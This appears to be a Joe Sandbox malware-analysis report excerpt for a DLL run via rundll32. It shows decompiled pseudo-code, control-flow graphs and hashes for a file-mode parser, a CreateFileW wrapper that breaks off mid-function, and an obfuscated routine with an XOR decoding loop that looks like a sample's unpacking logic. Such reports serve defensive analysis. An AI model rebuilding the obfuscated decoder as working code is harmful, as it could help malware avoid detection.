                          0x7ff88c07fa86
                          0x7ff88c07fa8a
                          0x7ff88c07fa8d
                          0x7ff88c07fa94
                          0x7ff88c07fa9b
                          0x7ff88c07faa3
                          0x7ff88c07faad
                          0x7ff88c07fab4
                          0x7ff88c07fab9
                          0x7ff88c07facd
                          0x7ff88c07fad3
                          0x7ff88c07fadf
                          0x7ff88c07faea
                          0x7ff88c07faf1
                          0x7ff88c07faf7
                          0x7ff88c07fafa
                          0x7ff88c07faff
                          0x7ff88c07fb18
                          0x7ff88c07fb1f
                          0x7ff88c07fb24
                          0x7ff88c07fb33
                          0x7ff88c07fb38
                          0x7ff88c07fb57

                          APIs
                          • _invalid_parameter_noinfo.LIBCMT ref: 00007FF88C07F994
                            • Part of subcall function 00007FF88C07E5A0: IsProcessorFeaturePresent.KERNEL32(00007FF88C080B95), ref: 00007FF88C07E5A9
                            • Part of subcall function 00007FF88C07E5A0: GetCurrentProcess.KERNEL32(00007FF88C080B95), ref: 00007FF88C07E5CD
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.405784597.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000006.00000002.405761108.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405829932.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405874359.00007FF88C0A8000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405912361.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405939935.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7ff88c070000_rundll32.jbxd
                          Similarity
                          • API ID: CurrentFeaturePresentProcessProcessor_invalid_parameter_noinfo
                          • String ID: *?$.
                          • API String ID: 4036615347-3972193922
                          • Opcode ID: 4cda8f812522c02942c11826489b886558005b358df05b685b12336f39f260f7
                          • Instruction ID: 100939bfa5983ec9180eb91ef71791c8c740c5b9116cce3bc6e37a4d42781363
                          • Opcode Fuzzy Hash: 4cda8f812522c02942c11826489b886558005b358df05b685b12336f39f260f7
                          • Instruction Fuzzy Hash: CF510262B15B9A85EF18DFA6D8010BD67A4FB69BD8B448532DE1D17B89EF3DD042C300
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 323 7ff88c07e9e0-7ff88c07ea10 324 7ff88c07ea1a-7ff88c07ea1d 323->324 325 7ff88c07ea12-7ff88c07ea18 323->325 326 7ff88c07ea1f-7ff88c07ea22 324->326 327 7ff88c07ea40 324->327 325->324 325->325 329 7ff88c07ea35-7ff88c07ea3e 326->329 330 7ff88c07ea24-7ff88c07ea27 326->330 328 7ff88c07ea46 327->328 331 7ff88c07ea4d-7ff88c07ea5c 328->331 329->331 332 7ff88c07ec5d-7ff88c07ec68 call 7ff88c07e6a0 call 7ff88c07e580 330->332 333 7ff88c07ea2d-7ff88c07ea33 330->333 334 7ff88c07ea5e-7ff88c07ea61 331->334 348 7ff88c07ec6d-7ff88c07ec7a 332->348 333->328 336 7ff88c07eb8b-7ff88c07eb8e 334->336 337 7ff88c07ea67-7ff88c07ea6d 334->337 342 7ff88c07eb93-7ff88c07eb96 336->342 343 7ff88c07eb90 336->343 339 7ff88c07eb0c-7ff88c07eb0f 337->339 340 7ff88c07ea73 337->340 346 7ff88c07eb65-7ff88c07eb6b 339->346 347 7ff88c07eb11-7ff88c07eb14 339->347 344 7ff88c07eafc-7ff88c07eaff 340->344 345 7ff88c07ea79-7ff88c07ea7c 340->345 342->343 349 7ff88c07eb98-7ff88c07eb9b 342->349 343->342 350 7ff88c07eb6d-7ff88c07eb6f 344->350 351 7ff88c07eb01 344->351 352 7ff88c07eb79-7ff88c07eb85 345->352 353 7ff88c07ea82-7ff88c07ea85 345->353 346->350 354 7ff88c07eb71 346->354 355 7ff88c07eb56-7ff88c07eb5d 347->355 356 7ff88c07eb16-7ff88c07eb19 347->356 357 7ff88c07ebaf-7ff88c07ebc6 call 7ff88c081b40 349->357 358 7ff88c07eb9d-7ff88c07eba0 349->358 350->352 362 7ff88c07eb04-7ff88c07eb0a 351->362 352->334 352->336 363 7ff88c07ea87-7ff88c07ea8a 353->363 364 7ff88c07ead0-7ff88c07ead3 353->364 365 7ff88c07eb75 354->365 355->350 361 7ff88c07eb5f-7ff88c07eb63 355->361 366 7ff88c07eb1b-7ff88c07eb1e 356->366 367 7ff88c07eb44-7ff88c07eb47 356->367 357->332 378 7ff88c07ebcc-7ff88c07ebd0 357->378 358->332 359 7ff88c07eba6-7ff88c07ebaa 358->359 359->348 361->365 362->352 371 7ff88c07ea8c-7ff88c07ea8f 363->371 372 7ff88c07eac8-7ff88c07eacb 363->372 364->350 369 7ff88c07ead9-7ff88c07eae0 364->369 373 7ff88c07eb77 365->373 374 7ff88c07eb38-7ff88c07eb3b 366->374 375 7ff88c07eb20-7ff88c07eb23 366->375 367->350 368 7ff88c07eb49 367->368 376 7ff88c07eb4e-7ff88c07eb54 368->376 369->350 377 7ff88c07eae6-7ff88c07eafa 369->377 379 7ff88c07eab6-7ff88c07eaba 371->379 380 7ff88c07ea91-7ff88c07ea94 371->380 372->350 373->352 374->350 382 7ff88c07eb3d-7ff88c07eb42 374->382 375->332 381 7ff88c07eb29-7ff88c07eb30 375->381 376->352 377->373 383 7ff88c07ebd5-7ff88c07ebd8 378->383 379->350 387 7ff88c07eac0-7ff88c07eac3 379->387 384 7ff88c07eaad-7ff88c07eab1 380->384 385 7ff88c07ea96-7ff88c07ea99 380->385 381->350 386 7ff88c07eb32-7ff88c07eb36 381->386 382->376 388 7ff88c07ebda-7ff88c07ebdd 383->388 389 7ff88c07ebd2 383->389 384->373 385->332 390 7ff88c07ea9f-7ff88c07eaa2 385->390 386->365 387->365 388->332 391 7ff88c07ebdf-7ff88c07ebe5 388->391 389->383 390->350 392 7ff88c07eaa8-7ff88c07eaab 390->392 391->391 393 7ff88c07ebe7-7ff88c07ebfe call 7ff88c081c08 391->393 392->362 396 7ff88c07ec0a-7ff88c07ec21 call 7ff88c081c08 393->396 397 7ff88c07ec00-7ff88c07ec08 393->397 403 7ff88c07ec2d-7ff88c07ec44 call 7ff88c081c08 396->403 404 7ff88c07ec23-7ff88c07ec2b 396->404 398 7ff88c07ec53-7ff88c07ec56 397->398 400 7ff88c07ec58 398->400 401 7ff88c07ec50 398->401 400->358 401->398 403->332 407 7ff88c07ec46-7ff88c07ec4e 403->407 404->398 407->398
                          C-Code - Quality: 87%
                          			E00007FF87FF88C07E9E0(intOrPtr* __rax, long long __rbx, signed int* __rcx, char* __rdx, long long _a8) {
                          				long long _v24;
                          				signed int _t21;
                          				signed int _t24;
                          				void* _t39;
                          				char _t42;
                          				void* _t47;
                          				void* _t63;
                          				signed int _t69;
                          				signed int _t74;
                          				intOrPtr* _t89;
                          				char* _t93;
                          				char* _t94;
                          				char* _t96;
                          				char* _t98;
                          				char* _t99;
                          				void* _t100;
                          				void* _t101;
                          				void* _t119;
                          
                          				_t89 = __rax;
                          				_a8 = __rbx;
                          				_t21 =  *0x8c0b4dc8; // 0x0
                          				_v24 = __rcx;
                          				asm("movsd xmm0, [esp+0x20]");
                          				asm("movsd [edi], xmm0");
                          				__rcx[2] = 0;
                          				__rcx[1] = _t21;
                          				if ( *__rdx != 0x20) goto 0x8c07ea1a;
                          				_t93 = __rdx + 1;
                          				if ( *_t93 == 0x20) goto 0x8c07ea12;
                          				if ( *_t93 == 0x61) goto 0x8c07ea40;
                          				if ( *_t93 == 0x72) goto 0x8c07ea35;
                          				if ( *_t93 != 0x77) goto 0x8c07ec5d;
                          				 *__rcx = 0x301;
                          				goto 0x8c07ea46;
                          				 *__rcx =  *__rcx & 0;
                          				__rcx[1] = 1;
                          				goto 0x8c07ea4d;
                          				 *__rcx = 0x109;
                          				__rcx[1] = 2;
                          				_t94 = _t93 + 1;
                          				r9b = 0;
                          				r11b = 0;
                          				r10b = 0;
                          				r8b = 0;
                          				if ( *_t94 == 0) goto 0x8c07eb8b;
                          				_t42 =  *_t94;
                          				_t63 = _t42 - 0x53;
                          				if (_t63 > 0) goto 0x8c07eb0c;
                          				if (_t63 == 0) goto 0x8c07eafc;
                          				if (_t63 == 0) goto 0x8c07eb79;
                          				if (_t63 == 0) goto 0x8c07ead0;
                          				if (_t63 == 0) goto 0x8c07eac8;
                          				if (_t63 == 0) goto 0x8c07eab6;
                          				_t47 = _t42 - 0xfffffffffffffff2;
                          				if (_t63 == 0) goto 0x8c07eaad;
                          				if (_t47 != 4) goto 0x8c07ec5d;
                          				if (r10b != 0) goto 0x8c07eb6d;
                          				 *__rcx =  *__rcx | 0x00000010;
                          				goto 0x8c07eb04;
                          				asm("bts dword [edi], 0x7");
                          				goto 0x8c07eb77;
                          				if (( *__rcx & 0x00000040) != 0) goto 0x8c07eb6d;
                          				goto 0x8c07eb75;
                          				r8b = 1;
                          				goto 0x8c07eb6d;
                          				if (r11b != 0) goto 0x8c07eb6d;
                          				_t24 =  *__rcx;
                          				r11b = 1;
                          				if ((_t24 & 0x00000002) != 0) goto 0x8c07eb6d;
                          				 *__rcx = _t24 & 0xfffffffe | 0x00000002;
                          				__rcx[1] = __rcx[1] & 0xfffffffc | 0x00000004;
                          				goto 0x8c07eb77;
                          				_t69 = r10b;
                          				if (_t69 != 0) goto 0x8c07eb6d;
                          				 *__rcx =  *__rcx | 0x00000020;
                          				r10b = 1;
                          				goto 0x8c07eb79;
                          				if (_t69 == 0) goto 0x8c07eb65;
                          				if (_t69 == 0) goto 0x8c07eb56;
                          				if (_t69 == 0) goto 0x8c07eb44;
                          				if (_t69 == 0) goto 0x8c07eb38;
                          				if (_t47 - 0x3a != 6) goto 0x8c07ec5d;
                          				if (( *__rcx & 0x0000c000) != 0) goto 0x8c07eb6d;
                          				asm("bts eax, 0xe");
                          				goto 0x8c07eb75;
                          				if (r9b != 0) goto 0x8c07eb6d;
                          				asm("btr dword [edi+0x4], 0xb");
                          				goto 0x8c07eb4e;
                          				if (r9b != 0) goto 0x8c07eb6d;
                          				asm("bts dword [edi+0x4], 0xb");
                          				r9b = 1;
                          				goto 0x8c07eb79;
                          				_t74 =  *__rcx & 0x0000c000;
                          				if (_t74 != 0) goto 0x8c07eb6d;
                          				asm("bts eax, 0xf");
                          				goto 0x8c07eb75;
                          				asm("bt eax, 0xc");
                          				if (_t74 >= 0) goto 0x8c07eb71;
                          				goto 0x8c07eb79;
                          				asm("bts eax, 0xc");
                          				if (1 != 0) goto 0x8c07ea5e;
                          				if (r8b == 0) goto 0x8c07eb93;
                          				_t96 = _t94 + __rax + 1;
                          				if ( *_t96 == 0x20) goto 0x8c07eb90;
                          				if (r8b != 0) goto 0x8c07ebaf;
                          				if ( *_t96 != 0) goto 0x8c07ec5d;
                          				__rcx[2] = 1;
                          				goto 0x8c07ec6d;
                          				r8d = 3;
                          				if (E00007FF87FF88C081B40(_t47 - 0x3a, _t96, 0x8c09ed38, _t119) != 0) goto 0x8c07ec5d;
                          				goto 0x8c07ebd5;
                          				_t98 = _t96 + 4;
                          				if ( *_t98 == 0x20) goto 0x8c07ebd2;
                          				if ( *_t98 != 0x3d) goto 0x8c07ec5d;
                          				_t99 = _t98 + 1;
                          				if ( *_t99 == 0x20) goto 0x8c07ebdf;
                          				r8d = 5;
                          				if (E00007FF87FF88C081C08(1, _t89, _t99) != 0) goto 0x8c07ec0a;
                          				_t100 = _t99 + 5;
                          				asm("bts dword [edi], 0x12");
                          				goto 0x8c07ec53;
                          				r8d = 8;
                          				if (E00007FF87FF88C081C08(1, _t89, _t100) != 0) goto 0x8c07ec2d;
                          				_t101 = _t100 + 8;
                          				asm("bts dword [edi], 0x11");
                          				goto 0x8c07ec53;
                          				r8d = 7;
                          				if (E00007FF87FF88C081C08(1, _t89, _t101) != 0) goto 0x8c07ec5d;
                          				asm("bts dword [edi], 0x10");
                          				goto 0x8c07ec53;
                          				if ( *((char*)(_t101 + 8)) == 0x20) goto 0x8c07ec50;
                          				goto 0x8c07eb9d;
                          				_t39 = E00007FF87FF88C07E6A0(_t89);
                          				 *_t89 = 0x16;
                          				return E00007FF87FF88C07E580(_t39);
                          			}





















                          0x7ff88c07e9e0
                          0x7ff88c07e9e0
                          0x7ff88c07e9ea
                          0x7ff88c07e9fb
                          0x7ff88c07ea00
                          0x7ff88c07ea06
                          0x7ff88c07ea0a
                          0x7ff88c07ea0d
                          0x7ff88c07ea10
                          0x7ff88c07ea12
                          0x7ff88c07ea18
                          0x7ff88c07ea1d
                          0x7ff88c07ea22
                          0x7ff88c07ea27
                          0x7ff88c07ea2d
                          0x7ff88c07ea33
                          0x7ff88c07ea35
                          0x7ff88c07ea37
                          0x7ff88c07ea3e
                          0x7ff88c07ea40
                          0x7ff88c07ea46
                          0x7ff88c07ea4d
                          0x7ff88c07ea50
                          0x7ff88c07ea53
                          0x7ff88c07ea56
                          0x7ff88c07ea59
                          0x7ff88c07ea61
                          0x7ff88c07ea67
                          0x7ff88c07ea6a
                          0x7ff88c07ea6d
                          0x7ff88c07ea73
                          0x7ff88c07ea7c
                          0x7ff88c07ea85
                          0x7ff88c07ea8a
                          0x7ff88c07ea8f
                          0x7ff88c07ea91
                          0x7ff88c07ea94
                          0x7ff88c07ea99
                          0x7ff88c07eaa2
                          0x7ff88c07eaa8
                          0x7ff88c07eaab
                          0x7ff88c07eaad
                          0x7ff88c07eab1
                          0x7ff88c07eaba
                          0x7ff88c07eac3
                          0x7ff88c07eac8
                          0x7ff88c07eacb
                          0x7ff88c07ead3
                          0x7ff88c07ead9
                          0x7ff88c07eadb
                          0x7ff88c07eae0
                          0x7ff88c07eaec
                          0x7ff88c07eaf7
                          0x7ff88c07eafa
                          0x7ff88c07eafc
                          0x7ff88c07eaff
                          0x7ff88c07eb01
                          0x7ff88c07eb04
                          0x7ff88c07eb0a
                          0x7ff88c07eb0f
                          0x7ff88c07eb14
                          0x7ff88c07eb19
                          0x7ff88c07eb1e
                          0x7ff88c07eb23
                          0x7ff88c07eb30
                          0x7ff88c07eb32
                          0x7ff88c07eb36
                          0x7ff88c07eb3b
                          0x7ff88c07eb3d
                          0x7ff88c07eb42
                          0x7ff88c07eb47
                          0x7ff88c07eb49
                          0x7ff88c07eb4e
                          0x7ff88c07eb54
                          0x7ff88c07eb58
                          0x7ff88c07eb5d
                          0x7ff88c07eb5f
                          0x7ff88c07eb63
                          0x7ff88c07eb67
                          0x7ff88c07eb6b
                          0x7ff88c07eb6f
                          0x7ff88c07eb71
                          0x7ff88c07eb85
                          0x7ff88c07eb8e
                          0x7ff88c07eb90
                          0x7ff88c07eb96
                          0x7ff88c07eb9b
                          0x7ff88c07eba0
                          0x7ff88c07eba6
                          0x7ff88c07ebaa
                          0x7ff88c07ebaf
                          0x7ff88c07ebc6
                          0x7ff88c07ebd0
                          0x7ff88c07ebd2
                          0x7ff88c07ebd8
                          0x7ff88c07ebdd
                          0x7ff88c07ebdf
                          0x7ff88c07ebe5
                          0x7ff88c07ebe7
                          0x7ff88c07ebfe
                          0x7ff88c07ec00
                          0x7ff88c07ec04
                          0x7ff88c07ec08
                          0x7ff88c07ec0a
                          0x7ff88c07ec21
                          0x7ff88c07ec23
                          0x7ff88c07ec27
                          0x7ff88c07ec2b
                          0x7ff88c07ec2d
                          0x7ff88c07ec44
                          0x7ff88c07ec4a
                          0x7ff88c07ec4e
                          0x7ff88c07ec56
                          0x7ff88c07ec58
                          0x7ff88c07ec5d
                          0x7ff88c07ec62
                          0x7ff88c07ec7a

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.405784597.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000006.00000002.405761108.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405829932.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405874359.00007FF88C0A8000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405912361.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405939935.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7ff88c070000_rundll32.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo
                          • String ID: $ $ $ $ $=$UTF-16LEUNICODE$UTF-8$a$ccs$r$w
                          • API String ID: 3215553584-2974328796
                          • Opcode ID: 3d3d684f05ca60b9351f6ae1519f0e4da1bcc7ff1a8d1dac3fd3f5df153a3e81
                          • Instruction ID: f0b2bf7eb0a0a44d839523c32f5bb024ddbf7d8b605cf142be3c687dc01552fc
                          • Opcode Fuzzy Hash: 3d3d684f05ca60b9351f6ae1519f0e4da1bcc7ff1a8d1dac3fd3f5df153a3e81
                          • Instruction Fuzzy Hash: 4F717E72D0E2469DFF6D4A24D65433A2E91BF237C4F149435CA3A465DDCB2EB820DB01
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 40%
                          			E00007FF87FF88C072380(signed int __rax, long long __rbx, void* __rcx, void* __rdx, signed int* __r8, void* __r9, long long __r12) {
                          				void* __rsi;
                          				signed int _t119;
                          				signed int _t160;
                          				void* _t163;
                          				signed int _t172;
                          				signed long long _t180;
                          				signed long long _t200;
                          				signed long long _t201;
                          				void* _t202;
                          				void* _t204;
                          				long long _t206;
                          				void* _t208;
                          				void* _t209;
                          				void* _t219;
                          				void* _t223;
                          				void* _t225;
                          				void* _t227;
                          
                          				_t172 = __rax;
                          				goto 0x8c091440;
                          				asm("int3");
                          				asm("int3");
                          				asm("int3");
                          				asm("int3");
                          				asm("int3");
                          				asm("int3");
                          				_t219 = _t208;
                          				 *((long long*)(_t219 + 0x18)) = __rbx;
                          				 *((long long*)(_t219 + 0x20)) = _t206;
                          				_push(_t204);
                          				_t209 = _t208 - 0x60;
                          				r13d = __r9 + 0x6ab;
                          				 *(_t209 + 0xb8) =  *((intOrPtr*)(_t209 + 0xc8)) + 0x152;
                          				 *((intOrPtr*)(_t209 + 0x98)) =  *(_t209 + 0xb8) + 0xfffffc37;
                          				r14d = __rcx + 0x37e1;
                          				r15d = __rdx + 0x1249;
                          				r14d =  <  ? __r9 - 0x2103 : r14d;
                          				if (r15d - _t206 + 0x3a59 > 0) goto 0x8c072709;
                          				 *((long long*)(_t219 + 8)) = __r12;
                          				_t163 = r14d - _t227 + 0x108;
                          				if (_t163 > 0) goto 0x8c0725c8;
                          				 *((long long*)(_t219 - 0x60)) = 0x2032;
                          				r12d = 0x3189;
                          				 *(_t209 + 0x20) = 0x3595;
                          				r8d = r12d;
                          				r9d = 0x1f2c;
                          				E00007FF87FF88C079AC0(__r8, __rcx, __r8, _t206, _t227); // executed
                          				r11d = _t202 + 0x19d;
                          				 *(_t209 + 0x50) = __r8;
                          				r10d = _t225 - 0x1033;
                          				__r8[0x22] = _t172;
                          				 *(_t209 + 0x48) = _t223 - 0x3b8;
                          				_t160 = __rcx - 0x114f;
                          				 *(_t209 + 0x40) = r10d;
                          				r8d = __rcx - 0x2ad;
                          				 *(_t209 + 0x38) = r11d;
                          				r9d = _t225 - 0x16de;
                          				 *(_t209 + 0x30) = _t206 + 0x36e7;
                          				 *((intOrPtr*)(_t209 + 0x28)) = __rdx + 0xfffffa9a;
                          				 *(_t209 + 0x20) = _t160;
                          				E00007FF87FF88C08F160(_t172, __r8, __r8, _t225, _t223, _t202);
                          				r8d = 0;
                          				if (_t163 == 0) goto 0x8c072589;
                          				r9d = r8d;
                          				asm("o16 nop [eax+eax]");
                          				_t200 = __r8[0x90];
                          				 *(__r9 + __r8[0x22]) =  *(_t200 + __r8[2]) & 0x000000ff ^  *(__r8[0x14] + __r9);
                          				__r8[0x90] = ( *((intOrPtr*)(__r8[0x10] + 0x130)) - 0x23f6) % __r8[0xe];
                          				__r8[0x7c] = __r8[0x7c] + 0x1f2c;
                          				if (__r8[0x78] != __r8[0xc]) goto 0x8c072568;
                          				__r8[0x32] = __r8[0x32] + 0xffffdfce;
                          				r8d = r8d + 1;
                          				_t180 = r8d;
                          				if (_t180 - _t200 < 0) goto 0x8c0724f0;
                          				__r8[0x66] = __r8[0x66] | 0x0a01b449;
                          				_t119 = __r8[0x4c] ^ 0x0000127e;
                          				if (_t119 - r12d >= 0) goto 0x8c0725b8;
                          				r12d = r12d - _t119;
                          				__r8[0x66] = __r8[0x66] + _t180 * 0x44f9;
                          				__r8[0x56] = __r8[0x14];
                          				goto 0x8c072701;
                          				if (r14d - _t204 + 0x329d + r14d >= 0) goto 0x8c072624;
                          				_t201 = _t200 | __r8[0x2a];
                          				if (__r8[0x2e] - _t201 > 0) goto 0x8c072624;
                          				if ( *((intOrPtr*)( *__r8 + 0x1d0)) + 0x8acf - _t201 <= 0) goto 0x8c072610;
                          				__r8[0x32] = __r8[0x32] - ( *__r8 - 0x00001f2c ^ 0x00002032);
                          				if (__r8[0x7e] - (_t160 | r13d) < 0) goto 0x8c0726ed;
                          				r10d = _t160;
                          				r11d = __r8[0x78];
                          				r15d = r15d - (__r8[6] ^ r15d);
                          				r11d = r11d - __r8[0x74];
                          				r11d = r11d + __r8[0x24];
                          				r14d = r14d *  *__r8;
                          				r15d = r15d + 0xea7;
                          				r10d = r10d - __r8[0x12];
                          				r15d = r15d ^ 0x00002598;
                          				r8d = __r8[4];
                          				r9d = _t160;
                          				r8d = r8d &  *(_t209 + 0xb8);
                          				r12d = 0x3189;
                          				 *(_t209 + 0x58) = __r8[0x54] & 0x0000228c;
                          				r9d = r9d | r12d;
                          				 *(_t209 + 0x50) = _t160 & 0x00003666;
                          				 *(_t209 + 0x48) = r11d;
                          				 *(_t209 + 0x40) = __r8;
                          				 *(_t209 + 0x38) = r10d;
                          				 *(_t209 + 0x30) = r15d;
                          				 *((intOrPtr*)(_t209 + 0x28)) = _t223 - 0x343a;
                          				 *(_t209 + 0x20) = r14d;
                          				E00007FF87FF88C072060(__r8, _t160 | r13d, _t201, _t204, _t206, __r8[0x32] - ( *__r8 - 0x00001f2c ^ 0x00002032));
                          				__r8[0x62] = __r8[0x62] - __r8[0x4c] + _t160;
                          				return  *((intOrPtr*)(_t209 + 0xc0)) + 0xffffee61;
                          			}




















                          0x7ff88c072380
                          0x7ff88c072385
                          0x7ff88c07238a
                          0x7ff88c07238b
                          0x7ff88c07238c
                          0x7ff88c07238d
                          0x7ff88c07238e
                          0x7ff88c07238f
                          0x7ff88c072390
                          0x7ff88c072393
                          0x7ff88c072397
                          0x7ff88c07239b
                          0x7ff88c0723a3
                          0x7ff88c0723bc
                          0x7ff88c0723d4
                          0x7ff88c0723e1
                          0x7ff88c0723eb
                          0x7ff88c0723f2
                          0x7ff88c072402
                          0x7ff88c07240f
                          0x7ff88c07241c
                          0x7ff88c072420
                          0x7ff88c072423
                          0x7ff88c07242e
                          0x7ff88c072436
                          0x7ff88c07243c
                          0x7ff88c072441
                          0x7ff88c072444
                          0x7ff88c072452
                          0x7ff88c07245e
                          0x7ff88c072465
                          0x7ff88c07246a
                          0x7ff88c072471
                          0x7ff88c07248b
                          0x7ff88c07248f
                          0x7ff88c072495
                          0x7ff88c07249a
                          0x7ff88c0724a1
                          0x7ff88c0724a6
                          0x7ff88c0724ad
                          0x7ff88c0724b8
                          0x7ff88c0724c3
                          0x7ff88c0724c7
                          0x7ff88c0724cf
                          0x7ff88c0724de
                          0x7ff88c0724e4
                          0x7ff88c0724e7
                          0x7ff88c0724f0
                          0x7ff88c07250e
                          0x7ff88c072534
                          0x7ff88c07253e
                          0x7ff88c07255b
                          0x7ff88c07255d
                          0x7ff88c07256b
                          0x7ff88c07257d
                          0x7ff88c072583
                          0x7ff88c07258f
                          0x7ff88c07259a
                          0x7ff88c0725a2
                          0x7ff88c0725a4
                          0x7ff88c0725b1
                          0x7ff88c0725bc
                          0x7ff88c0725c3
                          0x7ff88c0725d4
                          0x7ff88c0725ea
                          0x7ff88c0725f4
                          0x7ff88c07261b
                          0x7ff88c07261d
                          0x7ff88c072634
                          0x7ff88c07263d
                          0x7ff88c072649
                          0x7ff88c072650
                          0x7ff88c072653
                          0x7ff88c07266d
                          0x7ff88c07267a
                          0x7ff88c07267e
                          0x7ff88c072685
                          0x7ff88c072689
                          0x7ff88c072690
                          0x7ff88c072694
                          0x7ff88c0726b2
                          0x7ff88c0726ba
                          0x7ff88c0726c0
                          0x7ff88c0726c4
                          0x7ff88c0726c7
                          0x7ff88c0726cb
                          0x7ff88c0726d0
                          0x7ff88c0726d5
                          0x7ff88c0726da
                          0x7ff88c0726df
                          0x7ff88c0726e3
                          0x7ff88c0726e8
                          0x7ff88c0726fa
                          0x7ff88c07272d

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.405784597.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000006.00000002.405761108.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405829932.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405874359.00007FF88C0A8000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405912361.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405939935.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7ff88c070000_rundll32.jbxd
                          Similarity
                          • API ID: Heap$AllocProcess
                          • String ID: 2 $6$62 $662 $7$8662
                          • API String ID: 1617791916-3329516171
                          • Opcode ID: d549252b29e21f15087af81f1e2d0605a3b1b60e3360cae5e9e19fc1c2354d83
                          • Instruction ID: f4e03784fdbce272c417aad10a8c1e144b91b8d91abee70699c1a71aecb99e41
                          • Opcode Fuzzy Hash: d549252b29e21f15087af81f1e2d0605a3b1b60e3360cae5e9e19fc1c2354d83
                          • Instruction Fuzzy Hash: F832F4735182C18BE371CF29E44479EBBA4F788748F144129EA8997B59DB7CE954CF00
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 39%
                          			E00007FF87FF88C08243C(signed int __ebx, void* __eflags, signed int __rbx, intOrPtr* __rcx, signed int* __rdx, signed int __rdi, void* __rsi, signed int __r8) {
                          				void* __rbp;
                          				signed int _t120;
                          				long _t134;
                          				void* _t137;
                          				void* _t139;
                          				void* _t140;
                          				signed int _t155;
                          				signed int _t156;
                          				signed char _t160;
                          				signed char _t161;
                          				void* _t185;
                          				void* _t186;
                          				signed int* _t207;
                          				intOrPtr* _t210;
                          				long long _t221;
                          				intOrPtr* _t229;
                          				signed long long _t237;
                          				intOrPtr _t251;
                          				signed long long _t252;
                          				signed long long _t272;
                          				signed long long _t273;
                          				signed int* _t278;
                          				void* _t281;
                          				void* _t282;
                          				signed int* _t284;
                          				void* _t285;
                          				void* _t293;
                          				void* _t295;
                          				void* _t300;
                          				void* _t303;
                          
                          				_t280 = __rsi;
                          				_t155 = __ebx;
                          				_t207 = _t284;
                          				_t207[2] = __rbx;
                          				_t207[4] = __rdi;
                          				_t207[6] = __r8;
                          				_t282 = _t207 - 0x47;
                          				_t285 = _t284 - 0xc0;
                          				r12d = r9d;
                          				r9d =  *(_t282 + 0x77);
                          				_t278 = __rdx;
                          				r8d =  *(_t282 + 0x6f);
                          				_t229 = __rcx;
                          				E00007FF87FF88C0820A8(r12d, __eflags, _t207, __rcx, _t282 - 1, _t282);
                          				asm("movups xmm0, [eax]");
                          				asm("movups xmm1, xmm0");
                          				asm("psrldq xmm1, 0x8");
                          				asm("dec cx");
                          				 *(_t282 - 0x11) = _t303 >> 0x20;
                          				asm("movups [ebp-0x59], xmm0");
                          				asm("movsd xmm0, [eax+0x10]");
                          				asm("movsd [ebp-0x31], xmm0");
                          				asm("movsd [ebp-0x49], xmm0");
                          				if (r15d != 0xffffffff) goto 0x8c0824c7;
                          				E00007FF87FF88C07E680(_t207);
                          				 *_t207 =  *_t207 & 0x00000000;
                          				 *__rdx =  *__rdx | 0xffffffff;
                          				E00007FF87FF88C07E6A0(_t207);
                          				goto 0x8c08280e;
                          				_t120 = E00007FF87FF88C083C80(r12d, _t185, _t207, _t229, _t282 - 1, __rdx, __rdx, __rsi);
                          				 *__rdx = _t120;
                          				if (_t120 != 0xffffffff) goto 0x8c0824eb;
                          				E00007FF87FF88C07E680(_t207);
                          				 *_t207 =  *_t207 & 0x00000000;
                          				 *__rdx =  *__rdx | 0xffffffff;
                          				E00007FF87FF88C07E6A0(_t207);
                          				 *_t207 = 0x18;
                          				goto 0x8c0824bb;
                          				 *(_t285 + 0x30) =  *(_t285 + 0x30) & 0x00000000;
                          				r8d = r15d;
                          				 *(_t282 - 0x21) =  *(_t282 - 0x21) & 0x00000000;
                          				 *_t229 = 1;
                          				_t231 =  *(_t282 - 0x49) >> 0x20;
                          				_t156 = _t155 |  *(_t282 - 0x49);
                          				 *(_t285 + 0x28) = _t156;
                          				 *((intOrPtr*)(_t285 + 0x20)) =  *((intOrPtr*)(_t282 - 0x51));
                          				 *(_t282 - 0x29) = 0x18;
                          				 *(_t282 - 0x19) =  !(r12d >> 7) & 0x00000001;
                          				 *(_t282 - 0x39) =  *(_t282 - 0x49) >> 0x20;
                          				CreateFileW(??, ??, ??, ??, ??, ??, ??);
